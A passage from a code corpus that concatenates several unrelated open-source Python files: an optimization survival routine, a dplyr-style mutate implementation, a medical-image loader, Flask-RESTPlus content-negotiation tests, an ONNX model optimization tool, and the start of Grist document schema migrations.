self.filter_infeasible = filter_infeasible
def do(self,
problem,
pop,
*args,
n_survive=None,
return_indices=False,
**kwargs):
# make sure the population has at least one individual
if len(pop) == 0:
return pop
if n_survive is None:
n_survive = len(pop)
n_survive = min(n_survive, len(pop))
# if the split should be done beforehand
if self.filter_infeasible and problem.n_constr > 0:
# split feasible and infeasible solutions
feas, infeas = split_by_feasibility(pop, eps=0.0, sort_infeasbible_by_cv=True)
if len(feas) == 0:
survivors = Population()
else:
survivors = self._do(problem, pop[feas], *args, n_survive=min(len(feas), n_survive), **kwargs)
# calculate how many individuals are still remaining to be filled up with infeasible ones
n_remaining = n_survive - len(survivors)
# if infeasible solutions needs to be added
if n_remaining > 0:
survivors = Population.merge(survivors, pop[infeas[:n_remaining]])
else:
survivors = self._do(problem, pop, *args, n_survive=n_survive, **kwargs)
if return_indices:
H = {}
for k, ind in enumerate(pop):
H[ind] = k
return [H[survivor] for survivor in survivors]
else:
return survivors
@abstractmethod
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
pass
def split_by_feasibility(pop, eps=0.0, sort_infeasbible_by_cv=True):
CV = pop.get("CV")
b = (CV <= eps)
feasible = np.where(b)[0]
infeasible = np.where(~b)[0]
if sort_infeasbible_by_cv:
infeasible = infeasible[np.argsort(CV[infeasible, 0])]
return feasible, infeasible
def calc_adapt_eps(pop):
cv = pop.get("CV")[:, 0]
cv_mean = np.median(cv)
fr = (cv <= 0).sum() / len(cv)
return cv_mean * fr
|
datar/dplyr/mutate.py
|
stjordanis/datar
| 110 |
79028
|
<filename>datar/dplyr/mutate.py
"""Create, modify, and delete columns
See source https://github.com/tidyverse/dplyr/blob/master/R/mutate.R
"""
from typing import Any, Tuple, List, Union
from pandas import DataFrame, Series
from pipda import register_verb, evaluate_expr, ContextBase
from pipda.utils import CallingEnvs
from ..core.contexts import Context, ContextEval
from ..core.utils import (
dedup_name,
recycle_value,
arg_match,
df_setitem,
name_mutatable_args,
reconstruct_tibble,
)
from ..core.defaults import DEFAULT_COLUMN_PREFIX
from ..core.grouped import DataFrameGroupBy
from ..base import setdiff, union, intersect, c, NA
from .group_by import group_by_drop_default
from .group_data import group_vars, group_data
from .relocate import relocate
@register_verb(
DataFrame,
context=Context.PENDING,
extra_contexts={"_before": Context.SELECT, "_after": Context.SELECT},
)
def mutate(
_data: DataFrame,
*args: Any,
_keep: str = "all",
_before: Union[int, str] = None,
_after: Union[int, str] = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrame:
"""Adds new variables and preserves existing ones
The original API:
https://dplyr.tidyverse.org/reference/mutate.html
Args:
_data: A data frame
_keep: allows you to control which columns from _data are retained
in the output:
- "all", the default, retains all variables.
- "used" keeps any variables used to make new variables;
it's useful for checking your work as it displays inputs and
outputs side-by-side.
- "unused" keeps only existing variables not used to make new
variables.
- "none", only keeps grouping keys (like transmute()).
_before: and
_after: Optionally, control where new columns should appear
(the default is to add to the right hand side).
See relocate() for more details.
base0_: Whether `_before` and `_after` are 0-based if given by indexes.
If not provided, will use `datar.base.get_option('index.base.0')`
*args: and
**kwargs: Name-value pairs. The name gives the name of the column
in the output. The value can be:
- A vector of length 1, which will be recycled to the correct
length.
- A vector the same length as the current group (or the whole
data frame if ungrouped).
- None to remove the column
Returns:
An object of the same type as _data. The output has the following
properties:
- Rows are not affected.
- Existing columns will be preserved according to the _keep
argument. New columns will be placed according to the
_before and _after arguments. If _keep = "none"
(as in transmute()), the output order is determined only
by ..., not the order of existing columns.
- Columns given value None will be removed
- Groups will be recomputed if a grouping variable is mutated.
- Data frame attributes are preserved.
"""
keep = arg_match(_keep, "_keep", ["all", "unused", "used", "none"])
context = ContextEval()
cols, removed = _mutate_cols(_data, context, *args, **kwargs)
if cols is None:
cols = DataFrame(index=_data.index)
out = _data.copy()
# order is the same as _data
out[cols.columns.tolist()] = cols
# out.columns.difference(removed)
# changes column order when removed == []
out = out[setdiff(out.columns, removed, __calling_env=CallingEnvs.REGULAR)]
if _before is not None or _after is not None:
new = setdiff(
cols.columns,
_data.columns,
__calling_env=CallingEnvs.REGULAR,
)
out = relocate(
out,
*new,
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
)
if keep == "all":
keep = out.columns
elif keep == "unused":
used = context.used_refs.keys()
unused = setdiff(
_data.columns,
used,
__calling_env=CallingEnvs.REGULAR,
)
keep = intersect(
out.columns,
c(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
unused,
cols.columns,
),
__calling_env=CallingEnvs.REGULAR,
)
elif keep == "used":
used = context.used_refs.keys()
keep = intersect(
out.columns,
c(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
used,
cols.columns,
),
__calling_env=CallingEnvs.REGULAR,
)
else: # keep == 'none':
keep = union(
setdiff(
group_vars(_data, __calling_env=CallingEnvs.REGULAR),
cols.columns,
__calling_env=CallingEnvs.REGULAR,
),
intersect(
cols.columns,
out.columns,
__calling_env=CallingEnvs.REGULAR,
),
__calling_env=CallingEnvs.REGULAR,
)
out = out[keep]
return out.loc[[], :] if len(_data) == 0 else out
@mutate.register(DataFrameGroupBy, context=Context.PENDING)
def _(
_data: DataFrameGroupBy,
*args: Any,
_keep: str = "all",
_before: str = None,
_after: str = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrameGroupBy:
"""Mutate on DataFrameGroupBy object"""
def apply_func(df):
if isinstance(df, Series):
df = df.to_frame().T
index = df.attrs["_group_index"] = df.index[0]
df.attrs["_group_data"] = _data._group_data
rows = [index]
else:
index = df.attrs["_group_index"]
rows = df.attrs["_group_data"].loc[index, "_rows"]
ret = mutate(
df.reset_index(drop=True),
*args,
_keep=_keep,
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
**kwargs,
)
ret.index = rows
return ret
out = _data._datar_apply(apply_func, _drop_index=False).sort_index()
if out.shape[0] > 0:
# keep the original row order
# out.sort_index(inplace=True)
# not only DataFrameGroupBy but also DataFrameRowwise
return reconstruct_tibble(_data, out, keep_rowwise=True)
# 0-row
named = name_mutatable_args(*args, **kwargs)
df = DataFrame({key: [] for key in named})
out = _data.copy()
out[df.columns.tolist()] = df
return _data.__class__(
out,
_group_vars=group_vars(_data, __calling_env=CallingEnvs.REGULAR),
_group_drop=group_by_drop_default(_data),
_group_data=group_data(_data, __calling_env=CallingEnvs.REGULAR),
)
@register_verb(DataFrame, context=Context.PENDING)
def transmute(
_data: DataFrame,
*args: Any,
_before: Union[int, str] = None,
_after: Union[int, str] = None,
base0_: bool = None,
**kwargs: Any,
) -> DataFrame:
"""Mutate with _keep='none'
See Also:
[`mutate()`](datar.dplyr.mutate.mutate).
"""
return mutate(
_data,
*args,
_keep="none",
_before=_before,
_after=_after,
base0_=base0_,
__calling_env=CallingEnvs.REGULAR,
**kwargs,
)
def _mutate_cols(
_data: DataFrame,
_context: ContextBase,
*args: Any,
**kwargs: Any,
) -> Tuple[DataFrame, List[str]]:
"""Mutate columns"""
if not args and not kwargs:
return None, []
_data = _data.copy()
named_mutatables = name_mutatable_args(*args, **kwargs)
new_columns = []
removed = []
add_new_name = True
for name, mutatable in named_mutatables.items():
ddp_name = dedup_name(name, list(named_mutatables))
# if not a dedup name, it's a new name
add_new_name = ddp_name == name
mutatable = evaluate_expr(mutatable, _data, _context)
if mutatable is None:
if ddp_name in _data:
removed.append(ddp_name)
_data.drop(columns=[ddp_name], inplace=True)
# be silent if name doesn't exist
continue
if isinstance(mutatable, DataFrame):
if mutatable.shape[1] == 0 and not ddp_name.startswith(
DEFAULT_COLUMN_PREFIX
):
_data = df_setitem(
_data, ddp_name, [NA] * max(mutatable.shape[0], 1)
)
if add_new_name:
new_columns.append(ddp_name)
else:
for col in mutatable.columns:
new_name = (
col
if ddp_name.startswith(DEFAULT_COLUMN_PREFIX)
else f"{ddp_name}${col}"
)
coldata = recycle_value(
mutatable[col], _data.shape[0], ddp_name
)
_data = df_setitem(_data, new_name, coldata)
if add_new_name:
new_columns.append(new_name)
else:
mutatable = recycle_value(mutatable, _data.shape[0], ddp_name)
_data = df_setitem(_data, ddp_name, mutatable)
if add_new_name:
new_columns.append(ddp_name)
# keep column order
return _data[new_columns], removed
|
src/HyperDenseNet/Modules/IO/loadData.py
|
jiajunhua/josedolz-HyperDenseNet
| 147 |
79029
|
"""
Copyright (c) 2016, <NAME> .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
<NAME>. April, 2018.
email: <EMAIL>
LIVIA Department, ETS, Montreal.
"""
import numpy as np
import pdb
# If you are not using nifti files you can comment this line
import nibabel as nib
import scipy.io as sio
from ImgOperations.imgOp import applyPadding
# ----- Loader for nifti files ------ #
def load_nii (imageFileName, printFileNames) :
if printFileNames == True:
print (" ... Loading file: {}".format(imageFileName))
img_proxy = nib.load(imageFileName)
imageData = img_proxy.get_data()
return (imageData,img_proxy)
def release_nii_proxy(img_proxy) :
img_proxy.uncache()
# ----- Loader for matlab format ------- #
# Very important: All the volumes should have been saved as 'vol'.
# Otherwise, change its name here
def load_matlab (imageFileName, printFileNames) :
if printFileNames == True:
print (" ... Loading file: {}".format(imageFileName))
mat_contents = sio.loadmat(imageFileName)
imageData = mat_contents['vol']
return (imageData)
""" It loads the images (CT/MRI + Ground Truth + ROI) for the patient image Idx"""
def load_imagesSinglePatient(imageIdx,
imageNames,
imageNames_Bottom,
groundTruthNames,
roiNames,
applyPaddingBool,
receptiveField,
sampleSizes,
imageType
):
if imageIdx >= len(imageNames) :
print (" ERROR!!!!! : The image index specified is greater than images array size....)")
exit(1)
# --- Load image data (CT/MRI/...) ---
printFileNames = False # Get this from config.ini
imageFileName = imageNames[imageIdx]
if imageType == 0:
[imageData,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData = load_matlab(imageFileName, printFileNames)
if applyPaddingBool == True :
[imageData, paddingValues] = applyPadding(imageData, sampleSizes, receptiveField)
else:
paddingValues = ((0,0),(0,0),(0,0))
if len(imageData.shape) > 3 :
imageData = imageData[:,:,:,0]
if imageType == 0:
release_nii_proxy(img_proxy)
# --- Load image data for bottom path (CT/MRI/...) ---
printFileNames = False # Get this from config.ini
imageFileName = imageNames_Bottom[imageIdx]
if imageType == 0:
[imageData_Bottom,img_proxy] = load_nii(imageFileName, printFileNames)
else:
imageData_Bottom = load_matlab(imageFileName, printFileNames)
if applyPaddingBool == True :
[imageData_Bottom, paddingValues] = applyPadding(imageData_Bottom, sampleSizes, receptiveField)
else:
paddingValues = ((0,0),(0,0),(0,0))
if len(imageData_Bottom.shape) > 3 :
imageData_Bottom = imageData_Bottom[:,:,:,0]
if imageType == 0:
release_nii_proxy(img_proxy)
# --- Load ground truth (i.e. labels) ---
if len(groundTruthNames) > 0 :
GTFileName = groundTruthNames[imageIdx]
if imageType == 0:
[gtLabelsData, gt_proxy] = load_nii (GTFileName, printFileNames)
else:
gtLabelsData = load_matlab(GTFileName, printFileNames)
# Convert ground truth to int type
if np.issubdtype( gtLabelsData.dtype, np.int ) :
gtLabelsData = gtLabelsData
else:
np.rint(gtLabelsData).astype("int32")
imageGtLabels = gtLabelsData
if imageType == 0:
# Release data
release_nii_proxy(gt_proxy)
if applyPaddingBool == True :
[imageGtLabels, paddingValues] = applyPadding(imageGtLabels, sampleSizes, receptiveField)
else :
imageGtLabels = np.empty(0)
# --- Load roi ---
if len(roiNames)> 0 :
roiFileName = roiNames[imageIdx]
if imageType == 0:
[roiMaskData, roi_proxy] = load_nii (roiFileName, printFileNames)
else:
roiMaskData = load_matlab(roiFileName, printFileNames)
roiMask = roiMaskData
if imageType == 0:
# Release data
release_nii_proxy(roi_proxy)
if applyPaddingBool == True :
[roiMask, paddingValues] = applyPadding(roiMask, sampleSizes, receptiveField)
else :
roiMask = np.ones(imageGtLabels.shape)
return [imageData, imageData_Bottom, imageGtLabels, roiMask, paddingValues]
# -------------------------------------------------------- #
def getRandIndexes(total, maxNumberIdx) :
# Generate a shuffle array of a vector containing "total" elements
idxs = range(total)
np.random.shuffle(idxs)
rand_idxs = idxs[0:maxNumberIdx]
return rand_idxs
|
tests/test_accept.py
|
alanjcastonguay/flask-restplus
| 2,885 |
79035
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import flask_restplus as restplus
class Foo(restplus.Resource):
def get(self):
return "data"
class ErrorsTest(object):
def test_accept_default_application_json(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers={'Accept': None})
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_application_json_by_default(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_no_default_match_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_default_override_accept(self, app, client):
api = restplus.Api(app)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_default_any_pick_first(self, app, client):
api = restplus.Api(app)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', '*/*')])
assert res.status_code == 200
assert res.content_type == 'application/json'
def test_accept_no_default_no_match_not_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 406
assert res.content_type == 'application/json'
def test_accept_no_default_custom_repr_match(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_custom_repr_not_acceptable(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status_code == 406
assert res.content_type == 'text/plain'
def test_accept_no_default_match_q0_not_acceptable(self, app, client):
"""
q=0 should be considered NotAcceptable,
but this depends on werkzeug >= 1.0 which is not yet released
so this test is expected to fail until we depend on werkzeug >= 1.0
"""
api = restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0')])
assert res.status_code == 406
assert res.content_type == 'application/json'
def test_accept_no_default_accept_highest_quality_of_two(self, app, client):
api = restplus.Api(app, default_mediatype=None)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=1.0')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_accept_highest_quality_of_three(self, app, client):
api = restplus.Api(app, default_mediatype=None)
@api.representation('text/html')
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = app.make_response((str(data), status_code, headers))
return resp
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=0.3, text/html; q=0.2')])
assert res.status_code == 200
assert res.content_type == 'text/plain'
def test_accept_no_default_no_representations(self, app, client):
api = restplus.Api(app, default_mediatype=None)
api.representations = {}
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 406
assert res.content_type == 'text/plain'
def test_accept_invalid_default_no_representations(self, app, client):
api = restplus.Api(app, default_mediatype='nonexistant/mediatype')
api.representations = {}
api.add_resource(Foo, '/test/')
res = client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status_code == 500
|
tools/optimize/nanodet_m-opt.py
|
zhouzy-creator/Tengine
| 4,697 |
79059
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
# OPEN AI LAB is pleased to support the open source community by supporting Tengine available.
#
# Copyright (C) 2021 OPEN AI LAB. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
This tool is mainly for optimizing the network structure of nanodet_m.ckpt from
https://github.com/RangiLyu/nanodet .
Preparation:
1. Export pytorch model to onnx by official tools/export_onnx.py, e.g.
$ python tools/export_onnx.py --cfg_path config/nanodet-m.yml --model_path nanodet_m.ckpt
Optimization:
1. Load onnx model and just simplify it:
$ python3 nanodet_m-opt.py --input nanodet_m.onnx --output nanodet_m-opt.onnx
Optimization(not recommended):
1. Updata the output shape in all distance prediction branches from [1, *, 32] to [1, *, 4, 8];
2. Add additional "Softmax" node in the end of all distance prediction branches with axis=-1;
3. Update output tensor name(from "dis_pred_stride_*" to "dis_sm_stride_*", in which "sm" is
short for "softmax") and shape(from [1, *, 32] to [1, *, 4, 8] for later integral);
4. Check and simplify new onnx model.
$ python3 nanodet_m-opt.py --input nanodet_m.onnx --output nanodet_m-opt.onnx --softmax --const 893,915,937
This tool is based on ONNX Framework.
Author:
<EMAIL>
Histroy:
2021/06/26 create
"""
import argparse
import onnx
from onnxsim import simplify
def parse_args():
parser = argparse.ArgumentParser(description='NanoDet-m Optimize Tool Parameters')
parser.add_argument('--input', type=str, default='nanodet_m.onnx', help='input model path')
parser.add_argument('--output', type=str, default='nanodet_m-opt.onnx', help='output model path')
parser.add_argument('--const', type=str, default='893,915,937', help='constant(nodes) for final reshape node in distance prediction branch')
parser.add_argument("--softmax", action='store_true', default=False, help="add additional softmax node to distance prediction branch")
args = parser.parse_args()
return args
def optimize_node_shape(nodes, names):
"""
optimize input constant nodes of final reshape nodes in distance prediction branch
Args:
nodes: the graph.node of ONNX model
names: target constant node name list
Returns:
optimized graph nodes(inplace)
"""
## new shape value for "Constant" nodes
t = onnx.helper.make_tensor('', onnx.TensorProto.INT64, [4], [1, 4, 8, -1])
t = [onnx.helper.make_attribute(key, value) for key, value in {"value": t}.items()]
## new attribute for "Transpose" nodes
a = [onnx.helper.make_attribute(key, value) for key, value in {"perm":(0,3,1,2)}.items()]
reshape_output = []
for i, n in enumerate(nodes):
if 'Constant' == n.op_type and n.output[0] in names:
## replace attr with new one
n.attribute.pop()
n.attribute.extend(t)
#print(n)
continue
if 'Reshape' == n.op_type and set(names).intersection(n.input):
## cache output tensor name of reshape node
reshape_output.extend(n.output)
#print(n)
continue
if 'Transpose' == n.op_type and n.input[0] in reshape_output:
## replace attr with new one
n.attribute.pop()
n.attribute.extend(a)
#print(n)
continue
return nodes
def optimize_output_tensor(output):
"""
optimize output tensor name and shape
Args:
output: the graph.output of ONNX model
Returns:
optimized graph output(inplace)
"""
for o in output:
if "dis_pred_stride_" in o.name:
_d = o.type.tensor_type.shape.dim
## kick out the last dim: 32
d2 = _d.pop(2)
## add two new dims: 4, 8
d2.dim_value = 4
_d.append(d2)
d2.dim_value = 8
_d.append(d2)
## update output name
o.name = o.name.replace("dis_pred_stride_", "dis_sm_stride_")
return output
def optimize_add_softmax(nodes):
"""
add additional softmax node in the end of all distance prediction branches
Args:
nodes: the graph.node of ONNX model
Returns:
optimized graph nodes(inplace)
"""
for n in nodes:
if 'Transpose' == n.op_type and "dis_pred_stride_" in n.output[0]:
## add additional softmax node
_input = n.output[0]
_output = _input.replace("dis_pred_stride_", "dis_sm_stride_")
n_sm = onnx.helper.make_node('Softmax', inputs=[_input], outputs=[_output], axis=-1)
nodes.append(n_sm)
return nodes
def usage_info():
"""
usage info
"""
print("Input params is illegal...╮(╯3╰)╭")
print("try it again:\n python nanodet_m-opt.py -h")
def main():
"""
main function
"""
print("---- Tengine NanoDet-m Optimize Tool ----\n")
args = parse_args()
if args == None or args.input == None:
usage_info()
return None
print(" Input model path : %s" % (args.input))
print("Output model path : %s" % (args.output))
# load original onnx model, graph, nodes
print("[Opt Tools Info]: Step 0, load original onnx model from %s." % (args.input))
onnx_model = onnx.load(args.input)
if args.softmax:
constant_shape_list = args.const.split(',')
# update input constant nodes
print("[Opt Tools Info]: Step 1, update the output shape in all dis_pred branches.")
optimize_node_shape(onnx_model.graph.node, constant_shape_list)
# add additional softmax nodes
print("[Opt Tools Info]: Step 2, add Softmax node in the end of all dis_pred branche.")
optimize_add_softmax(onnx_model.graph.node)
# update output tensor name and shape
print("[Opt Tools Info]: Step 3, update output tensor name and shape.")
optimize_output_tensor(onnx_model.graph.output)
# do check and simplify the onnx model
print("[Opt Tools Info]: Step 4, check and simplify the new onnx model.")
onnx_model, check = simplify(onnx_model)
# save the new optimize onnx model
print("[Opt Tools Info]: Step 5, save the new onnx model to %s" % (args.output))
onnx.save(onnx_model, args.output)
print("\n---- Tengine NanoDet-m Optimize onnx create success, best wish for your inference has a high accuracy ...\\(^0^)/ ----")
if __name__ == "__main__":
main()
|
sandbox/grist/migrations.py
|
gristlabs/grist-core
| 2,667 |
79126
|
<filename>sandbox/grist/migrations.py
import json
import re
import six
from six.moves import xrange
import actions
import identifiers
import schema
import summary
import table_data_set
import logger
log = logger.Logger(__name__, logger.INFO)
# PHILOSOPHY OF MIGRATIONS.
#
# We should probably never remove, modify, or rename metadata tables or columns.
# Instead, we should only add.
#
# We can mark old columns/tables as deprecated, which should be ignored except to prevent us from
# adding same-named entities in the future.
#
# If we change the meaning of a column, we have to create a new column with a new name.
#
# This should make it at least barely possible to share documents by people who are not all on the
# same Grist version (even so, it will require more work). It should also make it somewhat safe to
# upgrade and then open the document with a previous version.
all_migrations = {}
def noop_migration(_all_tables):
return []
# Each migration function includes a .need_all_tables attribute. See migration() decorator.
noop_migration.need_all_tables = False
def create_migrations(all_tables, metadata_only=False):
"""
Creates and returns a list of DocActions needed to bring this document to
schema.SCHEMA_VERSION.
all_tables: all tables or just the metadata tables (those named with _grist_ prefix) as a
dictionary mapping table name to TableData.
metadata_only: should be set if only metadata tables are passed in. If ALL tables are
required to process migrations, this method will raise a "need all tables..." exception.
"""
try:
doc_version = all_tables['_grist_DocInfo'].columns["schemaVersion"][0]
except Exception:
doc_version = 0
# We create a TableDataSet, and populate it with the subset of the current schema that matches
# all_tables. For missing items, we make up tables and incomplete columns, which should be OK
# since we would not be adding new records to deprecated columns.
# Note that this approach makes it NOT OK to change column types.
tdset = table_data_set.TableDataSet()
# For each table in the provided metadata tables, create an AddTable action.
user_schema = schema.build_schema(all_tables['_grist_Tables'],
all_tables['_grist_Tables_column'],
include_builtin=False)
for t in six.itervalues(user_schema):
tdset.apply_doc_action(actions.AddTable(t.tableId, schema.cols_to_dict_list(t.columns)))
# For each old table/column, construct an AddTable action using the current schema.
new_schema = {a.table_id: a for a in schema.schema_create_actions()}
for table_id, data in sorted(six.iteritems(all_tables)):
# User tables should already be in tdset; the rest must be metadata tables.
# (If metadata_only is true, there is simply nothing to skip here.)
if table_id not in tdset.all_tables:
new_col_info = {}
if table_id in new_schema:
new_col_info = {c['id']: c for c in new_schema[table_id].columns}
# Use an incomplete default for unknown (i.e. deprecated) columns; some uses of the column
# would be invalid, such as adding a new record with missing values.
col_info = sorted([new_col_info.get(col_id, {'id': col_id}) for col_id in data.columns],
key=lambda c: list(six.iteritems(c)))
tdset.apply_doc_action(actions.AddTable(table_id, col_info))
# And load in the original data, interpreting the TableData object as BulkAddRecord action.
tdset.apply_doc_action(actions.BulkAddRecord(*data))
migration_actions = []
for version in xrange(doc_version + 1, schema.SCHEMA_VERSION + 1):
migration_func = all_migrations.get(version, noop_migration)
if migration_func.need_all_tables and metadata_only:
raise Exception("need all tables for migration to %s" % version)
migration_actions.extend(all_migrations.get(version, noop_migration)(tdset))
# Note that if we are downgrading versions (i.e. doc_version is higher), then the following is
# the only action we include into the migration.
migration_actions.append(actions.UpdateRecord('_grist_DocInfo', 1, {
'schemaVersion': schema.SCHEMA_VERSION
}))
return migration_actions
def get_last_migration_version():
"""
Returns the last schema version number for which we have a migration defined.
"""
return max(all_migrations)
def migration(schema_version, need_all_tables=False):
"""
Decorator for migrations that associates the decorated migration function with the given
schema_version. This decorated function will be run to migrate forward to schema_version.
Migrations are first attempted with only metadata tables, but if any required migration function
is marked with need_all_tables=True, then the migration will be retried with all tables.
NOTE: new migrations should NOT set need_all_tables=True; it would require more work to process
very large documents safely (incuding those containing on-demand tables).
"""
def add_migration(migration_func):
migration_func.need_all_tables = need_all_tables
all_migrations[schema_version] = migration_func
return migration_func
return add_migration
# A little shorthand to make AddColumn actions more concise.
def add_column(table_id, col_id, col_type, *args, **kwargs):
return actions.AddColumn(table_id, col_id,
schema.make_column(col_id, col_type, *args, **kwargs))
# Another shorthand to only add a column if it isn't already there.
def maybe_add_column(tdset, table_id, col_id, col_type, *args, **kwargs):
if col_id not in tdset.all_tables[table_id].columns:
return add_column(table_id, col_id, col_type, *args, **kwargs)
return None
# Returns the next unused row id for the records of the table given by table_id.
def next_id(tdset, table_id):
row_ids = tdset.all_tables[table_id].row_ids
return max(row_ids) + 1 if row_ids else 1
# Parses a json string, but returns an empty object for invalid json.
def safe_parse(json_str):
try:
return json.loads(json_str)
except ValueError:
return {}
@migration(schema_version=1)
def migration1(tdset):
"""
Add TabItems table, and populate based on existing sections.
"""
doc_actions = []
# The very first migration is extra-lax, and creates some tables that are missing in some test
# docs. That's only because we did not distinguish schema version before migrations were
# implemented. Other migrations should not need such conditionals.
if '_grist_Attachments' not in tdset.all_tables:
doc_actions.append(actions.AddTable("_grist_Attachments", [
schema.make_column("fileIdent", "Text"),
schema.make_column("fileName", "Text"),
schema.make_column("fileType", "Text"),
schema.make_column("fileSize", "Int"),
schema.make_column("timeUploaded", "DateTime")
]))
if '_grist_TabItems' not in tdset.all_tables:
doc_actions.append(actions.AddTable("_grist_TabItems", [
schema.make_column("tableRef", "Ref:_grist_Tables"),
schema.make_column("viewRef", "Ref:_grist_Views"),
]))
if 'schemaVersion' not in tdset.all_tables['_grist_DocInfo'].columns:
doc_actions.append(add_column('_grist_DocInfo', 'schemaVersion', 'Int'))
doc_actions.extend([
add_column('_grist_Attachments', 'imageHeight', 'Int'),
add_column('_grist_Attachments', 'imageWidth', 'Int'),
])
view_sections = actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section'])
rows = sorted({(s.tableRef, s.parentId) for s in view_sections})
if rows:
values = {'tableRef': [r[0] for r in rows],
'viewRef': [r[1] for r in rows]}
row_ids = list(xrange(1, len(rows) + 1))
doc_actions.append(actions.ReplaceTableData('_grist_TabItems', row_ids, values))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=2)
def migration2(tdset):
"""
Add TableViews table, and populate based on existing sections.
Add TabBar table, and populate based on existing views.
Add PrimaryViewId to Tables and populated using relatedViews
"""
# Maps tableRef to viewRef
primary_views = {}
# Associate each view with a single table; this dict includes primary views.
views_to_table = {}
# For each table, find a view to serve as the primary view.
view_sections = actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section'])
for s in view_sections:
if s.tableRef not in primary_views and s.parentKey == "record":
# The view containing this section is a good candidate for primary view.
primary_views[s.tableRef] = s.parentId
if s.parentId not in views_to_table:
# The first time we see a (view, table) combination, associate the view with that table.
views_to_table[s.parentId] = s.tableRef
def create_primary_views_action(primary_views):
row_ids = sorted(primary_views.keys())
values = {'primaryViewId': [primary_views[r] for r in row_ids]}
return actions.BulkUpdateRecord('_grist_Tables', row_ids, values)
def create_tab_bar_action(views_to_table):
row_ids = list(xrange(1, len(views_to_table) + 1))
return actions.ReplaceTableData('_grist_TabBar', row_ids, {
'viewRef': sorted(views_to_table.keys())
})
def create_table_views_action(views_to_table, primary_views):
related_views = sorted(set(views_to_table.keys()) - set(primary_views.values()))
row_ids = list(xrange(1, len(related_views) + 1))
return actions.ReplaceTableData('_grist_TableViews', row_ids, {
'tableRef': [views_to_table[v] for v in related_views],
'viewRef': related_views,
})
return tdset.apply_doc_actions([
actions.AddTable('_grist_TabBar', [
schema.make_column('viewRef', 'Ref:_grist_Views'),
]),
actions.AddTable('_grist_TableViews', [
schema.make_column('tableRef', 'Ref:_grist_Tables'),
schema.make_column('viewRef', 'Ref:_grist_Views'),
]),
add_column('_grist_Tables', 'primaryViewId', 'Ref:_grist_Views'),
create_primary_views_action(primary_views),
create_tab_bar_action(views_to_table),
create_table_views_action(views_to_table, primary_views)
])
@migration(schema_version=3)
def migration3(tdset):
"""
